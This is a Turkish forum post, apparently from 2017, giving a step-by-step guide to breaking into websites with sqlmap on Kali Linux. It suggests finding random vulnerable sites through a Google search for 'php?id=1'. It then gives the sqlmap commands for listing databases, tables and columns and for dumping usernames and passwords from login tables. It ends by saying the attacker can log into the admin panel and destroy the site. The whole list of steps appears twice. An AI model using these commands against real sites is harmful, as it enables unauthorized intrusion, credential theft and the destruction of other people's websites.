Post by X on Dec 21, 2017 18:09:57 GMT
Konumuz website hack fakat kali linux üzerinden haydi başlıyoruz.
1) İlk olarak sitemizde SQL açığı bulunması gerekiyor . Bunun için de googleye '' php?id=1 '' komutunu aratmamız gerekiyor . ( Eğer rastgele bir site hackleyecekseniz bunu yapabilirsiniz . ) Fakat belli bir site varsa elinizdeki siteyi hacklemeyi deneyeceksiniz.
2) Sitemizi seçtikten sonra sitemize girip urlyi kopyalıyoruz .
3) Terminalimizi açtıktan sonra kodumuzu giriyoruz . '' sqlmap -u ' sitenin urlsi ' --dbs '' Bu komut bize uygun databaseleri gösterecektir .
4) Orada önünüze databaseler çıkacaktır . Bunlardan birini seçin fakat ' www ' databasesi çıktıysa
onu seçin derim .
5) Seçtikten sonra komutu giriyoruz . '' sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' --tables
'' Bu komut ise bize tableleri gösterir . Önünüze 10'dan fazla gelebilir.
6) Tablelerin arasından ise sonunda ' login ' ve ' users ' olanları not ediyoruz.(Herhangi bir yere)
7) Bizim işimiz login ile . Komutumuzu giriyoruz. '' sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' --columns ''
8) Bu komut bize login için uygun columnsları gösterecektir. Komutu girdiğimizde columnslar gelir ve biz ilk önce usernameye bakarız. Usernameyi görmek için ise bu komut işimize yarar.
''sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' -C username --dump ''
9) Bu komuttan sonra usernameyi buluruz. Ve sıra şifrede
''sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' -C password --dump ''
10) Bu komuttan sonra da şifre de bizim elimizde ve artık panele girip siteyi yok edebiliriz.
1) İlk olarak sitemizde SQL açığı bulunması gerekiyor . Bunun için de googleye '' php?id=1 '' komutunu aratmamız gerekiyor . ( Eğer rastgele bir site hackleyecekseniz bunu yapabilirsiniz . ) Fakat belli bir site varsa elinizdeki siteyi hacklemeyi deneyeceksiniz.
2) Sitemizi seçtikten sonra sitemize girip urlyi kopyalıyoruz .
3) Terminalimizi açtıktan sonra kodumuzu giriyoruz . '' sqlmap -u ' sitenin urlsi ' --dbs '' Bu komut bize uygun databaseleri gösterecektir .
4) Orada önünüze databaseler çıkacaktır . Bunlardan birini seçin fakat ' www ' databasesi çıktıysa
onu seçin derim .
5) Seçtikten sonra komutu giriyoruz . '' sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' --tables
'' Bu komut ise bize tableleri gösterir . Önünüze 10'dan fazla gelebilir.
6) Tablelerin arasından ise sonunda ' login ' ve ' users ' olanları not ediyoruz.(Herhangi bir yere)
7) Bizim işimiz login ile . Komutumuzu giriyoruz. '' sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' --columns ''
8) Bu komut bize login için uygun columnsları gösterecektir. Komutu girdiğimizde columnslar gelir ve biz ilk önce usernameye bakarız. Usernameyi görmek için ise bu komut işimize yarar.
''sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' -C username --dump ''
9) Bu komuttan sonra usernameyi buluruz. Ve sıra şifrede
''sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' -C password --dump ''
10) Bu komuttan sonra da şifre de bizim elimizde ve artık panele girip siteyi yok edebiliriz.
